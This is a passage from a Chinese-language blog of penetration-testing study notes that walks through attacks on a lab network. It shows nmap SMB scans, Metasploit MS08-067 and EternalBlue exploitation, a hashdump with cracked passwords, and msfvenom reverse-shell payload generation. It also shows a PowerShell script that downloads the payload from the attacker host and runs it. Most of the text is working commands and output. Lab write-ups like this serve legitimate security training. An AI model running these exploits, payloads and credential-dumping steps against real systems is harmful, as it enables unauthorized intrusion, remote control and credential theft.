分类目录归档:渗透测试

渗透测试学习笔记之案例二

0x00 前言

渗透是个持续的过程,不断地搜集信息,整理信息,以及利用信息,最终的目标就是拿到系统乃至整个网络的最高权限。在笔者看来,渗透测试与安全研究的最大不同就是前者擅长利用后者的研究成果并运用到实战之中。今天笔者将继续来分析渗透测试学习笔记系列的第二个案例。

0x01 案例分析

实验环境:

  • 目标靶机:10.11.1.0/24
  • 攻击机:Kali Linux (10.11.0.38)

渗透过程:

首先,一如既往的利用nmap来进行端口探测,比如我简单地探测了IP:10.11.1.227 如下:

# nmap -sV -O -Pn 10.11.1.227

Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-11 07:08 CST
Stats: 0:04:03 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Nmap scan report for 10.11.1.227
Host is up (0.28s latency).
Not shown: 992 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows 2000 microsoft-ds
1025/tcp open  msrpc        Microsoft Windows RPC
1026/tcp open  msrpc        Microsoft Windows RPC
3372/tcp open  msdtc        Microsoft Distributed Transaction Coordinator
5800/tcp open  vnc-http     RealVNC 4.0 (resolution: 400x250; VNC TCP port: 5900)
5900/tcp open  vnc          VNC (protocol 3.8)
MAC Address: 00:50:56:89:71:CB (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.50%E=4%D=8/11%OT=135%CT=1%CU=42087%PV=Y%DS=1%DC=D%G=Y%M=005056%
OS:TM=598CE880%P=i686-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=108%TI=I%TS=0)SEQ(S
OS:P=101%GCD=1%ISR=106%TI=I%II=I%SS=S%TS=0)OPS(O1=M529NW0NNT00NNS%O2=M529NW
OS:0NNT00NNS%O3=M529NW0NNT00%O4=M529NW0NNT00NNS%O5=M529NW0NNT00NNS%O6=M529N
OS:NT00NNS)WIN(W1=FAF0%W2=FAF0%W3=FAF0%W4=FAF0%W5=FAF0%W6=FAF0)ECN(R=Y%DF=Y
OS:%T=80%W=FAF0%O=M529NW0NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=
OS:)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=N%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R
OS:=N)T7(R=N)U1(R=Y%DF=N%T=80%IPL=38%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G
OS:)IE(R=Y%DFI=S%T=80%CD=Z)

Network Distance: 1 hop
Service Info: OSs: Windows, Windows 2000; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_2000

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 245.29 seconds

分析上面的扫描结果后,我们得到如下信息:

  1. 目标主机开启了139,445端口且banner显示为Microsoft Windows 2000 microsoft-ds
  2. 目标主机开启了Windows RPC服务,端口为1025和1026
  3. 目标主机开启了RealVNC服务,端口为5800和5900
  4. 目标主机很可能是Windows 2000服务器

整理完了这些信息之后,接下来我们需要思考突破点了,一个常见的思路是针对开启的服务寻找可能的利用方法。

  1. 对于139和445端口,我们首先需要考虑的就是smb漏洞,比如:ms17-010,ms08-067等等
  2. 对于Windows RPC和VNC服务,我们不妨看看有没有现成的exploit可以使用
  3. 对于Windows 2000服务器,足够老的服务器早已不再有补丁支持,是否可以被利用

诚如我之前所说,渗透测试要善于利用已知漏洞,可以利用搜索引擎检索,也可以利用一些漏洞利用数据库去查询(如:exploit-db, securityfocus等),还可以直接借助已有的渗透测试工具(如:nmap的NSE脚本,Metasploit的exploit模块,自己平时搜集的漏洞利用,等等)。

继续回到我们的目标主机(10.11.1.227),由于存在smb服务且目标主机很可能为Windows 2000服务器,一个简单的猜想便是是否存在ms08-067漏洞。为了验证我们的猜想,先用nmap扫描一下:

# nmap --script=/usr/share/nmap/scripts/smb-vuln-ms08-067.nse -sT -Pn 10.11.1.227

Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-11 08:59 CST
Nmap scan report for 10.11.1.227
Host is up (0.26s latency).
Not shown: 987 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
25/tcp   open  smtp
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
1029/tcp open  ms-lsa
3372/tcp open  msdtc
5800/tcp open  vnc-http
5900/tcp open  vnc

Host script results:
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|
|     Disclosure date: 2008-10-23
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250

从扫描结果可知,目标主机似乎是存在ms08-067漏洞的。既然如此,我们就来测试一下。考虑到msf已经有ms08-067的利用模块了,因此我们可以直接来尝试利用一下。

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 10.11.1.227
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 10.11.0.38:4444
[*] 10.11.1.227:445 - Automatically detecting the target...
[*] 10.11.1.227:445 - Fingerprint: Windows 2000 - Service Pack 0 - 4 - lang:English
[*] 10.11.1.227:445 - Selected Target: Windows 2000 Universal
[*] 10.11.1.227:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957487 bytes) to 10.11.1.227
[*] Meterpreter session 2 opened (10.11.0.38:4444 -> 10.11.1.227:1256) at 2017-08-11 08:39:12 +0800

meterpreter > 

果然,目标主机存在ms08-067漏洞,并且我们成功地获得了一个meterpreter会话。一旦有了meterpreter会话,我们需要考虑以下几个问题:

  • 当前运行的账户权限是不是SYSTEM且是否需要提权
  • 目标机器的系统信息是什么
  • 目标机器是否存在反病毒程序影响我们的后渗透操作
  • 目标机器上有哪些用户和组且是否存在域用户(如:域管理员账户)
  • 目标机器上是否可以dump hash(可用来破解密码或者Pass The Hash攻击)
  • 等等

如下一些常见的meterpreter和shell命令可以帮我们轻松地确认以上的问题:

getuid – 获取当前运行用户

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

getsystem – 利用内置的payload帮助提权

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

sysinfo – 获取操作系统信息

meterpreter > sysinfo
Computer        : JD
OS              : Windows 2000 (Build 2195).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 0
Meterpreter     : x86/windows

ps – 获取当前系统上正在运行的所有进程

meterpreter > ps

Process List
============

 PID   PPID  Name              Arch  Session  User                 Path
 ---   ----  ----              ----  -------  ----                 ----
 0     0     [System Process]  x86
 8     0     System            x86   0        NT AUTHORITY\SYSTEM
 172   8     smss.exe          x86   0        NT AUTHORITY\SYSTEM  \SystemRoot\System32\smss.exe
 196   172   csrss.exe         x86   0        NT AUTHORITY\SYSTEM  \??\C:\WINNT\system32\csrss.exe
 216   172   WINLOGON.EXE      x86   0        NT AUTHORITY\SYSTEM  \??\C:\WINNT\system32\winlogon.exe
 244   216   services.exe      x86   0        NT AUTHORITY\SYSTEM  C:\WINNT\system32\services.exe
 256   216   LSASS.EXE         x86   0        NT AUTHORITY\SYSTEM  C:\WINNT\system32\lsass.exe
 452   244   svchost.exe       x86   0        NT AUTHORITY\SYSTEM  C:\WINNT\system32\svchost.exe
 480   244   SPOOLSV.EXE       x86   0        NT AUTHORITY\SYSTEM  C:\WINNT\system32\spoolsv.exe
 512   244   msdtc.exe         x86   0        NT AUTHORITY\SYSTEM  C:\WINNT\System32\msdtc.exe
 616   244   svchost.exe       x86   0        NT AUTHORITY\SYSTEM  C:\WINNT\System32\svchost.exe
 644   244   LLSSRV.EXE        x86   0        NT AUTHORITY\SYSTEM  C:\WINNT\System32\llssrv.exe
 676   244   sqlservr.exe      x86   0        NT AUTHORITY\SYSTEM  C:\PROGRA~1\MICROS~3\MSSQL\binn\sqlservr.exe
 748   244   regsvc.exe        x86   0        NT AUTHORITY\SYSTEM  C:\WINNT\system32\regsvc.exe
 772   244   sqlagent.exe      x86   0        NT AUTHORITY\SYSTEM  C:\PROGRA~1\MICROS~3\MSSQL\binn\sqlagent.exe
 784   244   mstask.exe        x86   0        NT AUTHORITY\SYSTEM  C:\WINNT\system32\MSTask.exe
 812   244   snmp.exe          x86   0        NT AUTHORITY\SYSTEM  C:\WINNT\System32\snmp.exe
 860   244   vmtoolsd.exe      x86   0        NT AUTHORITY\SYSTEM  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 936   244   winmgmt.exe       x86   0        NT AUTHORITY\SYSTEM  C:\WINNT\System32\WBEM\WinMgmt.exe
 948   244   winvnc4.exe       x86   0        NT AUTHORITY\SYSTEM  C:\Program Files\RealVNC\VNC4\WinVNC4.exe
 960   244   svchost.exe       x86   0        NT AUTHORITY\SYSTEM  C:\WINNT\system32\svchost.exe
 980   244   inetinfo.exe      x86   0        NT AUTHORITY\SYSTEM  C:\WINNT\System32\inetsrv\inetinfo.exe
 992   244   mssearch.exe      x86   0        NT AUTHORITY\SYSTEM  C:\Program Files\Common Files\System\MSSearch\Bin\mssearch.exe
 1092  244   dfssvc.exe        x86   0        NT AUTHORITY\SYSTEM  C:\WINNT\system32\Dfssvc.exe
 1580  244   svchost.exe       x86   0        NT AUTHORITY\SYSTEM  C:\WINNT\System32\svchost.exe

hashdump – 获取系统上所有用户的LM Hash或者NTLM Hash

meterpreter > hashdump
admin:1007:a46139feaaf2b9f117306d272a9441bb:c5e0002fde3f5eb2cf5730ffee58ebcc:::
Administrator:500:7bfd3ee62cbb0eba886450c5d6c50f12:f3acbe7ec27aadbe8deeaa0c651a64af:::
backup:1006:16ac416c2658e00daad3b435b51404ee:938df8b296dd15d0dce8eaa37be593e0:::
david:1009:43af16fff22f1628aad3b435b51404ee:1fbff38cae51e9918da1fec572f03e11:::
gary:1013:998d9dc042886317c72befe227197ae1:ba359fa9d25791c2180e424bb7bb0753:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
homer:1017:ef91a6d3cf901b8baad3b435b51404ee:b184d292a82b6ad35c3cfca81f1f59bc:::
IUSR_SRV2:1020:f7d96ebcbe5b6be3103ccb00190f6271:09ff503707453d56bb69f40bef542da0:::
IWAM_SRV2:1019:96fe1fc02d73a84c463db170b09126f1:be6ec26d0d71a533e14b65ce755d7bce:::
john:1010:e52cac67419a9a2238f10713b629b565:5835048ce94ad0564e29a924a03510ef:::
lee:1015:b096847ead9b7476aad3b435b51404ee:208adb08381adab3032eedbd35399642:::
lisa:1011:a179639dcaf4e1c4aad3b435b51404ee:8acf28fdc0168e003fb3e05bcb463d1b:::
mark:1012:6c3d4c343f999422aad3b435b51404ee:bcd477bfdb45435a34c6a38403ca4364:::
ned:1016:836eda0fbc609e6393e28745b8bf4ba6:4f16328129408ed105dec3a938c266eb:::
nick:1014:59b8b93a9a6477e4aad3b435b51404ee:ee28ad35a22c752c1a75be3f9a7e82c9:::
simon:1008:598ddce2660d3193aad3b435b51404ee:2d20d252a479f485cdf5e171d93985bf:::
sqlusr:1005:6307ab24156c541aaad3b435b51404ee:6a370590bd44ac8e65d045254a170ab7:::
todd:1018:9e00b755e79c8cf95533b366e9511e4b:4150133921fe34dd2e777b1ca0361410:::
TsInternetUser:1000:e52cac67419a9a22f96f275e1115b16f:e22e04519aa757d12f1219c4f31252f4:::

shell – 开启一个cmd shell以便获取更过系统信息或者执行payload

meterpreter > shell
Process 760 created.
Channel 1 created.
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>net users
net users

User accounts for \\

-------------------------------------------------------------------------------
admin                    Administrator            backup
david                    gary                     Guest
homer                    IUSR_SRV2                IWAM_SRV2
john                     lee                      lisa
mark                     ned                      nick
simon                    sqlusr                   todd
TsInternetUser
The command completed with one or more errors.

C:\WINNT\system32>net view /domain
net view /domain
Domain

-------------------------------------------------------------------------------
MYGROUP
THINC
WORKGROUP
The command completed successfully.

C:\WINNT\system32>ipconfig -all
ipconfig -all

Windows 2000 IP Configuration

	Host Name . . . . . . . . . . . . : jd
	Primary DNS Suffix  . . . . . . . : acme.local
	Node Type . . . . . . . . . . . . : Mixed
	IP Routing Enabled. . . . . . . . : No
	WINS Proxy Enabled. . . . . . . . : No
	DNS Suffix Search List. . . . . . : acme.local

Ethernet adapter Local Area Connection:

	Connection-specific DNS Suffix  . :
	Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter
	Physical Address. . . . . . . . . : 00-50-56-89-5E-EC
	DHCP Enabled. . . . . . . . . . . : No
	IP Address. . . . . . . . . . . . : 10.11.1.227
	Subnet Mask . . . . . . . . . . . : 255.255.0.0
	Default Gateway . . . . . . . . . : 10.11.1.220
	DNS Servers . . . . . . . . . . . : 10.11.1.220
	                                    10.11.1.221

C:\WINNT\system32>net localgroup administrators
net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
backup
The command completed successfully.

C:\WINNT\system32>net view
net view
Server Name            Remark

-------------------------------------------------------------------------------
\\BETHANY
\\BOB2
\\CORY
\\GAMMA
\\MAIL                 thincmail
\\MIKE                 mike
\\SHERLOCK
The command completed successfully.

后渗透过程中的一个重要步骤就是Dump Hash,有了密码hash我们就可以来尝试破解密码以及Pass The Hash攻击了。通过上面的一系列信息获取,我们已经知道了目标系统是Windows 2000并了解到这些Hash都是易破解的LM Hash, 因此我们可以尝试去破解这些Hash来获取明文的密码,破解结果如下:

user: backup
Hash: 16ac416c2658e00daad3b435b51404ee:938df8b296dd15d0dce8eaa37be593e0
Password: backup

user: Administrator
Hash: 7bfd3ee62cbb0eba886450c5d6c50f12:f3acbe7ec27aadbe8deeaa0c651a64af
Password: 7A6417Yrjh

user: admin
Hash: a46139feaaf2b9f117306d272a9441bb:c5e0002fde3f5eb2cf5730ffee58ebcc
Password: CHANGEME

User: david
Hash: 43af16fff22f1628aad3b435b51404ee:1fbff38cae51e9918da1fec572f03e11:::
Password: 012345

User: gary
Hash: 998d9dc042886317c72befe227197ae1:ba359fa9d25791c2180e424bb7bb0753:::
Password: REDGREENBLUE

User: john
Hash: e52cac67419a9a2238f10713b629b565:5835048ce94ad0564e29a924a03510ef:::
Password: password1

... ...

http://www.objectif-securite.ch/en/ophcrack.php 一个在线的LMHash破解网站

至此,我们已经完全控制了目标机器并获取到了一些用户的明文密码以便为后期的持续渗透做准备。

0x02 小结

总结一下本案例中的渗透测试方法和思路:

  1. nmap扫描目标主机常见端口
  2. 分析和整理可能存在漏洞的服务
  3. 搜索和验证存在漏洞的服务
  4. 利用服务漏洞获取系统shell
  5. 判断是否需要提权操作
  6. 获取密码hash并破解用户明文密码
  7. 整理明文密码表为持续渗透做准备

注:转载请注明出处,尊重知识产权,从你我做起!

渗透测试学习笔记之案例一

0x00 前言

很久没有更新博客了,主要是因为工作很忙,写博客也太耗时间了。但是突然发现,许久不写很多东西都快生疏了。因而决定从今天起开始写一些跟渗透测试相关的文章,也可以认为是学习笔记吧,留作日后的技术积累和参考吧。

0x01 案列分析

实验环境:

  • 目标靶机:10.11.1.0/24
  • 攻击机:Kali Linux (10.11.0.79)

信息收集:

扫描存在smb服务的主机:

# nmap -A -p 139,445 10.11.1.1-254 -oG smb_service.txt
# cat smb_service.txt | grep -i windows | cut -d" " -f2
10.11.1.5
10.11.1.31
10.11.1.49
10.11.1.50
10.11.1.73
10.11.1.128
10.11.1.145
10.11.1.202
10.11.1.218
10.11.1.220
10.11.1.223
10.11.1.227
10.11.1.229
10.11.1.230
# cat smb_service.txt | grep -i open | cut -d" " -f2 > smb_server_all.txt

扫描存在smb漏洞的主机:

# find / -name smb*vuln*.nse
/usr/share/nmap/scripts/smb-vuln-cve2009-3103.nse
/usr/share/nmap/scripts/smb-vuln-ms06-025.nse
/usr/share/nmap/scripts/smb-vuln-cve-2017-7494.nse
/usr/share/nmap/scripts/smb-vuln-ms07-029.nse
/usr/share/nmap/scripts/smb-vuln-ms17-010.nse
/usr/share/nmap/scripts/smb-vuln-conficker.nse
/usr/share/nmap/scripts/smb-vuln-ms08-067.nse
/usr/share/nmap/scripts/smb-vuln-regsvc-dos.nse
/usr/share/nmap/scripts/smb-vuln-ms10-054.nse
/usr/share/nmap/scripts/smb-vuln-ms10-061.nse
# for vul in $(find / -name smb*vuln*.nse | cut -d"/" -f 6); do nmap -v -p 139,445 --script=$vul -iL smb_server_all.txt -oN smb_vulns_$vul.txt; done
# cat smb_vulns_smb-vuln-*.txt | grep IDs:
|     IDs:  CVE:CVE-2009-3103
|     IDs:  CVE:CVE-2009-3103
|     IDs:  CVE:CVE-2009-3103
|     IDs:  CVE:CVE-2009-3103
|     IDs:  CVE:CVE-2017-0143
|     IDs:  CVE:CVE-2017-0143
|     IDs:  CVE:CVE-2017-0143
|     IDs:  CVE:CVE-2017-0143
|     IDs:  CVE:CVE-2017-0143
|     IDs:  CVE:CVE-2017-0143
|     IDs:  CVE:CVE-2017-0143
|     IDs:  CVE:CVE-2017-0143
|     IDs:  CVE:CVE-2017-0143
|     IDs:  CVE:CVE-2017-0143
|     IDs:  CVE:CVE-2017-0143
|     IDs:  CVE:CVE-2017-0143
|     IDs:  CVE:CVE-2017-0143

漏洞利用:

检查并验证存在smb ms17-010漏洞的主机:

# cat ../scripts/smb_vulns_smb-vuln-ms17-010.nse.txt 
# Nmap 7.50 scan initiated Mon Jul  3 13:57:06 2017 as: nmap -v -p 139,445 --script=smb-vuln-ms17-010.nse -iL smb_server_all.txt -oN smb_vulns_smb-vuln-ms17-010.nse.txt
Nmap scan report for 10.11.1.5
Host is up (0.24s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:50:56:89:35:AF (VMware)

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|       
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

... ...

Nmap scan report for 10.11.1.220
Host is up (0.24s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:50:56:89:15:14 (VMware)

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|       
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

... ...

Nmap scan report for 10.11.1.230
Host is up (0.25s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:50:56:89:5C:19 (VMware)

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|       
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Read data files from: /usr/bin/../share/nmap
# Nmap done at Mon Jul  3 13:57:53 2017 -- 19 IP addresses (19 hosts up) scanned in 46.85 seconds

IP: 10.11.1.5 利用失败

msf > use exploit/windows/smb/ms17_010_eternalblue  
msf exploit(ms17_010_eternalblue) > show options    

Module options (exploit/windows/smb/ms17_010_eternalblue):                                              

   Name                Current Setting  Required  Description                                           
   ----                ---------------  --------  -----------                                           
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.     
   GroomDelta          5                yes       The amount to increase the groom count by per try.    
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.             
   ProcessName         spoolsv.exe      yes       Process to inject payload into.                       
   RHOST                                yes       The target address                                    
   RPORT               445              yes       The target port (TCP)                                 
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username    
   SMBUser                              no        (Optional) The username to authenticate as            
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.  
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.            


Exploit target:           

   Id  Name               
   --  ----               
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs    
msf exploit(ms17_010_eternalblue) > set RHOST 10.11.1.5
RHOST => 10.11.1.5
msf exploit(ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 10.11.0.79:4444 
[*] 10.11.1.5:445 - Connecting to target for exploitation.
[+] 10.11.1.5:445 - Connection established for exploitation.
[!] 10.11.1.5:445 - Target OS selected not valid for OS indicated by SMB reply
[!] 10.11.1.5:445 - Disable VerifyTarget option to proceed manually...
[-] 10.11.1.5:445 - Unable to continue with improper OS Target.
[*] Exploit completed, but no session was created.

IP: 10.11.1.230 同样地,利用失败了

msf exploit(ms17_010_eternalblue) > set RHOST 10.11.1.230
RHOST => 10.11.1.230
msf exploit(ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 10.11.0.79:4444 
[*] 10.11.1.230:445 - Connecting to target for exploitation.
[+] 10.11.1.230:445 - Connection established for exploitation.
[+] 10.11.1.230:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.11.1.230:445 - CORE raw buffer dump (25 bytes)
[*] 10.11.1.230:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 10.11.1.230:445 - 0x00000010  74 65 20 4e 20 37 36 30 30                       te N 7600       
[!] 10.11.1.230:445 - Target arch selected not valid for arch indicated by DCE/RPC reply
[!] 10.11.1.230:445 - Disable VerifyArch option to proceed manually...
[-] 10.11.1.230:445 - Unable to continue with improper OS Arch.
[*] Exploit completed, but no session was created.

IP: 10.11.1.220 成功利用并反弹了一个shell回来

msf exploit(ms17_010_eternalblue) > set RHOST 10.11.1.220
RHOST => 10.11.1.220
msf exploit(ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 10.11.0.79:4444 
[*] 10.11.1.220:445 - Connecting to target for exploitation.
[+] 10.11.1.220:445 - Connection established for exploitation.
[+] 10.11.1.220:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.11.1.220:445 - CORE raw buffer dump (51 bytes)
[*] 10.11.1.220:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 10.11.1.220:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard 
[*] 10.11.1.220:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
[*] 10.11.1.220:445 - 0x00000030  6b 20 31                                         k 1             
[+] 10.11.1.220:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.11.1.220:445 - Trying exploit with 12 Groom Allocations.
[*] 10.11.1.220:445 - Sending all but last fragment of exploit packet
[*] 10.11.1.220:445 - Starting non-paged pool grooming
[+] 10.11.1.220:445 - Sending SMBv2 buffers
[+] 10.11.1.220:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.11.1.220:445 - Sending final SMBv2 buffers.
[*] 10.11.1.220:445 - Sending last fragment of exploit packet!
[*] 10.11.1.220:445 - Receiving response from exploit packet
[+] 10.11.1.220:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.11.1.220:445 - Sending egg to corrupted connection.
[*] 10.11.1.220:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (10.11.0.79:4444 -> 10.11.1.220:62009) at 2017-07-04 03:08:40 -0400
[+] 10.11.1.220:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.11.1.220:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.11.1.220:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

后渗透利用:

在上一步中我们成功地从IP:10.11.1.220上反弹了一个shell回来,但很显然这不是一个完美的交互式的shell且不稳定可靠,那么接下来我们该怎么办呢?首先,我们想到的是获得一个功能更加强大且稳定可靠的meterpreter。

检查目标系统的操作系统版本:

C:\Windows\system32>dir c:\       
dir c:\
 Volume in drive C has no label.
 Volume Serial Number is A49A-E592

 Directory of c:\

12/27/2013  11:37 PM    <DIR>          Ftp Root
07/13/2009  07:20 PM    <DIR>          PerfLogs
12/28/2013  02:15 AM    <DIR>          Program Files
12/28/2013  10:03 PM    <DIR>          Program Files (x86)
12/27/2013  11:37 PM    <DIR>          temp
08/02/2012  01:59 PM    <DIR>          Users
12/27/2013  11:37 PM    <DIR>          Windows
               0 File(s)              0 bytes
               7 Dir(s)  28,860,628,992 bytes free

显然目标系统是一个64位的Windows server 2008的服务器。

接下来,生成一个64位windows的meterpreter payload:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker ip> LPORT=<listen port> -f exe -a x64 --platform win -o mp_64.exe

:32位的windows的meterpreter payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker ip> LPORT=<listen port> -f exe -a x86 --platform win -o mp_86.exe

上传meterpreter payload (mp_64.exe) 至攻击机的web目录中(/var/www/html/payload)以便目标机可以通过http链接来下载它。

重新开启一个msfconsole并开启监听。

msf > use exploit/multi/handler 
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > set LHOST 10.11.0.79
LHOST => 10.11.0.79
msf exploit(handler) > set LPORT 8080
LPORT => 8080
msf exploit(handler) > run

[*] Started reverse TCP handler on 10.11.0.79:8080 
[*] Starting the payload handler...

利用反弹的shell创建用于下载我们准备好的meterpreter payload的powershell脚本,然后执行脚本下载payload(mp_64.exe)并执行。

c:\Users\Administrator\Desktop>echo $storageDir=$pwd > wget.ps1
echo $storageDir=$pwd > wget.ps1

c:\Users\Administrator\Desktop>echo $webclient=New-Object System.Net.WebClient >>wget.ps1
echo $webclient=New-Object System.Net.WebClient >>wget.ps1

c:\Users\Administrator\Desktop>echo $url="http://10.11.0.79/payload/mp_64.exe" >>wget.ps1     
echo $url="http://10.11.0.79/payload/mp_64.exe" >>wget.ps1

c:\Users\Administrator\Desktop>echo $file="mp_64.exe" >>wget.ps1
echo $file="mp_64.exe" >>wget.ps1

c:\Users\Administrator\Desktop>echo $webclient.DownloadFile($url,$file) >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1

c:\Users\Administrator\Desktop>type wget.ps1
type wget.ps1
$storageDir=$pwd 
$webclient=New-Object System.Net.WebClient 
$url="http://10.11.0.79/payload/mp_64.exe" 
$file="mp_64.exe" 
$webclient.DownloadFile($url,$file) 

c:\Users\Administrator\Desktop>powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1  

c:\Users\Administrator\Desktop>mp_64.exe

至此,我们成功地获得了一个功能强大的meterpreter,并可以很容易去dump hash为更进一步的渗透做准备。

msf exploit(handler) > exploit

[*] Started reverse TCP handler on 10.11.0.79:8080 
[*] Starting the payload handler...
[*] Sending stage (1189423 bytes) to 10.11.1.220
[*] Meterpreter session 1 opened (10.11.0.79:8080 -> 10.11.1.220:49326) at 2017-08-09 03:57:36 -0400

meterpreter > help
Core Commands
=============

    Command                   Description
